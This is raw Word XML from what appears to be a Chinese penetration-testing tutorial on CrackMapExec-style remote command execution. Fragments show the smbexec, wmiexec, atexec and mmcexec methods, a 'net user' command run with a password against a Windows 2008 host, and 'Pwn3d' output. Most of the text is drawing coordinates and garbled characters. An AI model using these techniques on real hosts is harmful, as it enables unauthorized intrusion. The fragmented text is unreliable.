4647,4856,14651,4856,14655,4856,14659,4856,14664,4856,14668,4856,14673,4856,14677,4856,14682,4856,14687,4856,14692,4856,14697,4856,14702,4856,14707,4856,14712,4856,14717,4856,14723,4856,14728,4856,14734,4856,14740,4856,14746,4856,14752,4856,14758,4856,14764,4856,14770,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4856,14776,4855,14776,4855,14776,4855,14776,4855,14776,4855,14776,4855,14776,4855,14776,4854,14776,4854,14776,4854,14776,4854,14776,4853,14776,4853,14776,4853,14776,4853,14776,4852,14776,4852,14776,4852,14776,4851,14776,4851,14776,4850,14776,4850,14776,4850,14776,4849,14776,4849,14776,4848,14776,4848,14776,4847,14776,4846,14776,4846,14776,4845,14776,4845,14776,4844,14776,4843,14776,4843,14776,4842,14776,4841,14776,4840,14776,4839,14776,4839,14776,4838,14776,4837,14776,4836,14776,4835,14776,4834,14776,4833,14776,4832,14776,4831,14776,4830,14776,4829,14776,4828,14776,4826,14776,4825,14776,4824,14776,4823,14776,4821,14776,4820,14776,4819,14776,4817,14776,4816,14776,4814,14776,4813,14776,4811,14776,4810,14776,4808,14776,4806,14776,4805,14776,4803,14776,4801,14776,4799,14776,4797,14776,4795,14776,4793,14776,4791,14776,4789,14776,4787,14776,4785,14776,4783,14776,4781,14776,4779,14776,4776,14776,4774,14776,4772,14776,4769,14776,4767,14776,4764,14776,4762,14776,4759,14776,4756,14776,4754,14776,4751,14776,4748,14776,4745,14776,4742,14776,4739,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14776,4736,14775,4736,14775,4736,14775,4736,14775,4736,14775,4736,14774,4736,14774,4736,14774,4736,14773,4736,14773,4736,14773,4736,14772,4736,14772,4736,14771,4736,14771,4736,14770,4736,14770,4736,14769,4736,14769,4736,14768,4736,14767,4736,14767,4736,14766,4736,14765,4736,14764,4736,14764,4736,14763,4736,14762,4736,14761,4736,14760,4736,14759,4736,14758,4736,14756,4736,14755,4736,14754,4736,14753,4736,14751,4736,14750,4736,14748,4736,14747,4736,14745,4736,14744,4736,14742,4736,14740,4736,14739,4736,14737,4736,14735,4736,14733,4736,14731,4736,14729,4736,14727,4736,14725,4736,14722,4736,14720,4736,14718,4736,14715,4736,14713,4736,14710,4736,14707,4736,14705,4736,14702,4736,14699,4736,14696,4736,14693,4736,14690,4736,14687,4736,14683,4736,14680,4736,14677,4736,14673,4736,14670,4736,14666,4736,14662,4736,14659,4736,14655,4736,14651,4736,14647,4736,14643,4736,14638,4736,14634,4736,14630,4736,14625,4736,14620,4736,14616,4736,14611,4736,14606,4736,14601,4736,14596,4736,14591,4736,14586,4736,14580,4736,14575,4736,14569,4736,14564,4736,14558,4736,14552,4736,14546,4736,14540,4736,14534,4736,14528,4736,14521e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:757.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,15150" coordsize="130,270">
        <v:shape style="position:absolute;left:4710;top:15150;width:130;height:270" coordorigin="4710,15150" coordsize="130,270" path="m4736,15167l4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4736,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4737,15167,4738,15167,4738,15167,4738,15167,4738,15167,4738,15167,4739,15167,4739,15167,4739,15167,4739,15167,4739,15167,4740,15167,4740,15167,4740,15167,4741,15167,4741,15167,4741,15167,4742,15167,4742,15167,4742,15167,4743,15167,4743,15167,4744,15167,4744,15167,4745,15167,4745,15167,4746,15167,4746,15167,4747,15167,4748,15167,4748,15167,4749,15167,4750,15167,4750,15167,4751,15167,4752,15167,4753,15167,4753,15167,4754,15167,4755,15167,4756,15167,4757,15167,4758,15167,4759,15167,4760,15167,4761,15167,4762,15167,4763,15167,4764,15167,4765,15167,4766,15167,4768,15167,4769,15167,4770,15167,4772,15167,4773,15167,4774,15167,4776,15167,4777,15167,4779,15167,4780,15167,4782,15167,4783,15167,4785,15167,4787,15167,4788,15167,4790,15167,4792,15167,4794,15167,4796,15167,4797,15167,4799,15167,4801,15167,4803,15167,4806,15167,4808,15167,4810,15167,4812,15167,4814,15167,4817,15167,4819,15167,4821,15167,4824,15167,4826,15167,4829,15167,4831,15167,4834,15167,4836,15167,4839,15167,4842,15167,4845,15167,4848,15167,4850,15167,4853,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15167,4856,15168,4856,15168,4856,15168,4856,15168,4856,15168,4856,15168,4856,15169,4856,15169,4856,15169,4856,15170,4856,15170,4856,15170,4856,15171,4856,15171,4856,15172,4856,15172,4856,15173,4856,15173,4856,15174,4856,15174,4856,15175,4856,15176,4856,15176,4856,15177,4856,15178,4856,15179,4856,15180,4856,15180,4856,15181,4856,15182,4856,15183,4856,15184,4856,15186,4856,15187,4856,15188,4856,15189,4856,15190,4856,15192,4856,15193,4856,15195,4856,15196,4856,15198,4856,15199,4856,15201,4856,15203,4856,15205,4856,15206,4856,15208,4856,15210,4856,15212,4856,15214,4856,15216,4856,15219,4856,15221,4856,15223,4856,15226,4856,15228,4856,15231,4856,15233,4856,15236,4856,15238,4856,15241,4856,15244,4856,15247,4856,15250,4856,15253,4856,15256,4856,15260,4856,15263,4856,15266,4856,15270,4856,15273,4856,15277,4856,15281,4856,15285,4856,15288,4856,15292,4856,15296,4856,15301,4856,15305,4856,15309,4856,15314,4856,15318,4856,15323,4856,15327,4856,15332,4856,15337,4856,15342,4856,15347,4856,15352,4856,15357,4856,15363,4856,15368,4856,15374,4856,15379,4856,15385,4856,15391,4856,15397,4856,15403,4856,15409,4856,15415,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4856,15422,4855,15422,4855,15422,4855,15422,4855,15422,4855,15422,4855,15422,4855,15422,4854,15422,4854,15422,4854,15422,4854,15422,4853,15422,4853,15422,4853,15422,4853,15422,4852,15422,4852,15422,4852,15422,4851,15422,4851,15422,4850,15422,4850,15422,4850,15422,4849,15422,4849,15422,4848,15422,4848,15422,4847,15422,4846,15422,4846,15422,4845,15422,4845,15422,4844,15422,4843,15422,4843,15422,4842,15422,4841,15422,4840,15422,4839,15422,4839,15422,4838,15422,4837,15422,4836,15422,4835,15422,4834,15422,4833,15422,4832,15422,4831,15422,4830,15422,4829,15422,4828,15422,4826,15422,4825,15422,4824,15422,4823,15422,4821,15422,4820,15422,4819,15422,4817,15422,4816,15422,4814,15422,4813,15422,4811,15422,4810,15422,4808,15422,4806,15422,4805,15422,4803,15422,4801,15422,4799,15422,4797,15422,4795,15422,4793,15422,4791,15422,4789,15422,4787,15422,4785,15422,4783,15422,4781,15422,4779,15422,4776,15422,4774,15422,4772,15422,4769,15422,4767,15422,4764,15422,4762,15422,4759,15422,4756,15422,4754,15422,4751,15422,4748,15422,4745,15422,4742,15422,4739,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15422,4736,15421,4736,15421,4736,15421,4736,15421,4736,15421,4736,15421,4736,15421,4736,15421,4736,15420,4736,15420,4736,15420,4736,15420,4736,15419,4736,15419,4736,15419,4736,15418,4736,15418,4736,15418,4736,15417,4736,15417,4736,15416,4736,15416,4736,15415,4736,15415,4736,15414,4736,15413,4736,15413,4736,15412,4736,15411,4736,15411,4736,15410,4736,15409,4736,15408,4736,15407,4736,15406,4736,15405,4736,15404,4736,15403,4736,15402,4736,15400,4736,15399,4736,15398,4736,15397,4736,15395,4736,15394,4736,15392,4736,15391,4736,15389,4736,15387,4736,15386,4736,15384,4736,15382,4736,15380,4736,15378,4736,15376,4736,15374,4736,15372,4736,15370,4736,15368,4736,15365,4736,15363,4736,15360,4736,15358,4736,15355,4736,15353,4736,15350,4736,15347,4736,15344,4736,15341,4736,15338,4736,15335,4736,15332,4736,15329,4736,15325,4736,15322,4736,15319,4736,15315,4736,15311,4736,15308,4736,15304,4736,15300,4736,15296,4736,15292,4736,15288,4736,15284,4736,15279,4736,15275,4736,15270,4736,15266,4736,15261,4736,15256,4736,15251,4736,15247,4736,15241,4736,15236,4736,15231,4736,15226,4736,15220,4736,15215,4736,15209,4736,15203,4736,15197,4736,15192,4736,15185,4736,15179,4736,15173,4736,1516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Network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Configuration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Operators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memberc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ount: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Performance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Log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Users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14"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1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Performance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Monitor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Users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-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0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Power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Users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Print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Operators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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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Remote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Desktop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Users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5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Replicator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Users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membercount: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7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3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1" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="183" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分别支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4种执行Command，如无--exec-method执行，默认为wmiexec执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="77" w:after="0" w:line="241" w:lineRule="auto"/>
        <w:ind w:left="2307" w:right="8464" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mmc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wmiex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>atex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="248" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="183" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>基</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>于smbexec执行Command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'123456'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‐‐exec‐m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ethod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smbexec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‐x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'net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user'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Web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2008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760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Bv1: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455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BMI9HGC42S\administrator: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Pwn3d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Executed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via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smbexec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="66" w:after="0" w:line="179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3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\\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Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>���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û</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>��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ʻ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS" w:eastAsia="Arial Unicode MS"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>�</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="150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‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐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‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐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‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐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Guest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99.524pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,1990">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:1990" coordorigin="10402,0" coordsize="0,1990" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,2,10402,3,10402,3,10402,4,10402,5,10402,6,10402,8,10402,9,10402,10,10402,12,10402,14,10402,16,10402,18,10402,20,10402,23,10402,25,10402,28,10402,31,10402,35,10402,38,10402,42,10402,46,10402,50,10402,55,10402,59,10402,64,10402,70,10402,75,10402,81,10402,87,10402,93,10402,100,10402,107,10402,114,10402,122,10402,130,10402,138,10402,147,10402,156,10402,166,10402,175,10402,185,10402,196,10402,207,10402,218,10402,230,10402,242,10402,255,10402,268,10402,281,10402,295,10402,309,10402,324,10402,339,10402,355,10402,371,10402,388,10402,405,10402,422,10402,440,10402,459,10402,478,10402,498,10402,518,10402,539,10402,560,10402,582,10402,604,10402,627,10402,651,10402,675,10402,700,10402,725,10402,751,10402,777,10402,804,10402,832,10402,861,10402,890,10402,919,10402,950,10402,981,10402,1012,10402,1045,10402,1078,10402,1111,10402,1146,10402,1181,10402,1216,10402,1253,10402,1290,10402,1328,10402,1367,10402,1406,10402,1447,10402,1487,10402,1529,10402,1572,10402,1615,10402,1659,10402,1704,10402,1749,10402,1796,10402,1843,10402,1891,10402,1940,10402,199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999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17.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,350">
        <v:shape style="position:absolute;left:1490;top:1630;width:8990;height:350" coordorigin="1490,1630" coordsize="8990,35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5,10484,1645,10484,1646,10484,1646,10484,1646,10484,1646,10484,1646,10484,1646,10484,1647,10484,1647,10484,1647,10484,1648,10484,1648,10484,1648,10484,1649,10484,1649,10484,1650,10484,1650,10484,1651,10484,1652,10484,1652,10484,1653,10484,1654,10484,1654,10484,1655,10484,1656,10484,1657,10484,1658,10484,1659,10484,1660,10484,1661,10484,1662,10484,1663,10484,1665,10484,1666,10484,1667,10484,1669,10484,1670,10484,1672,10484,1674,10484,1675,10484,1677,10484,1679,10484,1681,10484,1683,10484,1685,10484,1687,10484,1689,10484,1691,10484,1694,10484,1696,10484,1699,10484,1701,10484,1704,10484,1706,10484,1709,10484,1712,10484,1715,10484,1718,10484,1721,10484,1725,10484,1728,10484,1731,10484,1735,10484,1738,10484,1742,10484,1746,10484,1750,10484,1754,10484,1758,10484,1762,10484,1766,10484,1771,10484,1775,10484,1780,10484,1784,10484,1789,10484,1794,10484,1799,10484,1804,10484,1810,10484,1815,10484,1820,10484,1826,10484,1832,10484,1838,10484,1844,10484,1850,10484,1856,10484,1862,10484,1869,10484,1875,10484,1882,10484,1889,10484,1896,10484,1903,10484,1910,10484,1917,10484,1925,10484,1933,10484,1940,10484,1948,10484,1956,10484,1965,10484,1973,10484,1981,10484,1990,10484,1990,10484,1990,10484,1990,10484,1990,10484,1990,10484,1990,10483,1990,10482,1990,10482,1990,10480,1990,10479,1990,10477,1990,10475,1990,10473,1990,10470,1990,10466,1990,10462,1990,10458,1990,10453,1990,10448,1990,10442,1990,10435,1990,10428,1990,10419,1990,10411,1990,10401,1990,10391,1990,10379,1990,10367,1990,10354,1990,10340,1990,10326,1990,10310,1990,10293,1990,10275,1990,10256,1990,10236,1990,10215,1990,10192,1990,10168,1990,10143,1990,10117,1990,10090,1990,10061,1990,10031,1990,9999,1990,9966,1990,9931,1990,9895,1990,9858,1990,9819,1990,9778,1990,9735,1990,9691,1990,9646,1990,9598,1990,9549,1990,9498,1990,9445,1990,9391,1990,9334,1990,9275,1990,9215,1990,9153,1990,9088,1990,9022,1990,8953,1990,8883,1990,8810,1990,8735,1990,8658,1990,8578,1990,8497,1990,8413,1990,8326,1990,8238,1990,8146,1990,8053,1990,7957,1990,7859,1990,7758,1990,7654,1990,7548,1990,7439,1990,7328,1990,7214,1990,7097,1990,6977,1990,6855,1990,6730,1990,6602,1990,6471,1990,6337,1990,6201,1990,6061,1990,5918,1990,5773,1990,5624,1990,5472,1990,5317,1990,5159,1990,4997,1990,4833,1990,4665,1990,4494,1990,4319,1990,4141,1990,3960,1990,3776,1990,3587,1990,3396,1990,3201,1990,3002,1990,2800,1990,2594,1990,2385,1990,2172,1990,1955,1990,1734,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1990,1510,1989,1510,1989,1510,1989,1510,1989,1510,1989,1510,1989,1510,1988,1510,1988,1510,1988,1510,1988,1510,1987,1510,1987,1510,1986,1510,1986,1510,1986,1510,1985,1510,1984,1510,1984,1510,1983,1510,1983,1510,1982,1510,1981,1510,1980,1510,1980,1510,1979,1510,1978,1510,1977,1510,1976,1510,1975,1510,1974,1510,1973,1510,1971,1510,1970,1510,1969,1510,1967,1510,1966,1510,1964,1510,1963,1510,1961,1510,1960,1510,1958,1510,1956,1510,1954,1510,1952,1510,1950,1510,1948,1510,1946,1510,1944,1510,1941,1510,1939,1510,1936,1510,1934,1510,1931,1510,1928,1510,1926,1510,1923,1510,1920,1510,1917,1510,1914,1510,1910,1510,1907,1510,1904,1510,1900,1510,1896,1510,1893,1510,1889,1510,1885,1510,1881,1510,1877,1510,1873,1510,1869,1510,1864,1510,1860,1510,1855,1510,1850,1510,1846,1510,1841,1510,1836,1510,1830,1510,1825,1510,1820,1510,1814,1510,1809,1510,1803,1510,1797,1510,1791,1510,1785,1510,1779,1510,1773,1510,1766,1510,1760,1510,1753,1510,1746,1510,1739,1510,1732,1510,1725,1510,1717,1510,1710,1510,1702,1510,1694,1510,1687,1510,1678,1510,1670,1510,1662,1510,1653,1510,1645e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:98.500pt;width:449.500pt;height:0.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1970" coordsize="8990,10">
        <v:shape style="position:absolute;left:1490;top:1970;width:8990;height:10" coordorigin="1490,1970" coordsize="8990,10" path="m1510,1982l1510,1982,1510,1982,1510,1982,1510,1982,1510,1982,1510,1982,1511,1982,1512,1982,1512,1982,1514,1982,1515,1982,1517,1982,1519,1982,1521,1982,1524,1982,1528,1982,1532,1982,1536,1982,1541,1982,1546,1982,1552,1982,1559,1982,1566,1982,1575,1982,1583,1982,1593,1982,1603,1982,1615,1982,1627,1982,1640,1982,1654,1982,1668,1982,1684,1982,1701,1982,1719,1982,1738,1982,1758,1982,1780,1982,1802,1982,1826,1982,1851,1982,1877,1982,1904,1982,1933,1982,1963,1982,1995,1982,2028,1982,2063,1982,2099,1982,2136,1982,2175,1982,2216,1982,2259,1982,2303,1982,2348,1982,2396,1982,2445,1982,2496,1982,2549,1982,2604,1982,2660,1982,2719,1982,2779,1982,2841,1982,2906,1982,2972,1982,3041,1982,3112,1982,3184,1982,3259,1982,3336,1982,3416,1982,3498,1982,3582,1982,3668,1982,3757,1982,3848,1982,3941,1982,4037,1982,4136,1982,4236,1982,4340,1982,4446,1982,4555,1982,4666,1982,4780,1982,4897,1982,5017,1982,5139,1982,5264,1982,5392,1982,5523,1982,5657,1982,5793,1982,5933,1982,6076,1982,6222,1982,6370,1982,6522,1982,6677,1982,6835,1982,6997,1982,7161,1982,7329,1982,7500,1982,7675,1982,7853,1982,8034,1982,8219,1982,8407,1982,8598,1982,8793,1982,8992,1982,9194,1982,9400,1982,9609,1982,9823,1982,10039,1982,10260,1982,10484,1982e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:81.599pt;width:445.800pt;height:17.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId24" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:519.500pt;margin-top:244.500pt;width:0.500pt;height:148.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,4890" coordsize="10,2970">
        <v:shape style="position:absolute;left:10390;top:4890;width:10;height:2970" coordorigin="10390,4890" coordsize="10,2970" path="m10402,4901l10402,4901,10402,4901,10402,4901,10402,4902,10402,4902,10402,4902,10402,4902,10402,4902,10402,4902,10402,4903,10402,4903,10402,4904,10402,4904,10402,4905,10402,4906,10402,4907,10402,4909,10402,4910,10402,4912,10402,4913,10402,4916,10402,4918,10402,4920,10402,4923,10402,4926,10402,4929,10402,4932,10402,4936,10402,4940,10402,4944,10402,4949,10402,4954,10402,4959,10402,4965,10402,4970,10402,4977,10402,4983,10402,4990,10402,4998,10402,5006,10402,5014,10402,5022,10402,5031,10402,5041,10402,5051,10402,5061,10402,5072,10402,5084,10402,5095,10402,5108,10402,5121,10402,5134,10402,5148,10402,5163,10402,5178,10402,5193,10402,5210,10402,5226,10402,5244,10402,5262,10402,5280,10402,5300,10402,5320,10402,5340,10402,5361,10402,5383,10402,5406,10402,5429,10402,5453,10402,5478,10402,5503,10402,5529,10402,5556,10402,5584,10402,5612,10402,5642,10402,5672,10402,5702,10402,5734,10402,5766,10402,5800,10402,5834,10402,5869,10402,5905,10402,5941,10402,5979,10402,6017,10402,6057,10402,6097,10402,6138,10402,6180,10402,6224,10402,6268,10402,6313,10402,6359,10402,6406,10402,6454,10402,6503,10402,6553,10402,6604,10402,6656,10402,6709,10402,6763,10402,6819,10402,6875,10402,6932,10402,6991,10402,7051,10402,7112,10402,7174,10402,7237,10402,7301,10402,7366,10402,7433,10402,7501,10402,7570,10402,7640,10402,7711,10402,7784,10402,7858e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:244.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,4890" coordsize="8990,670">
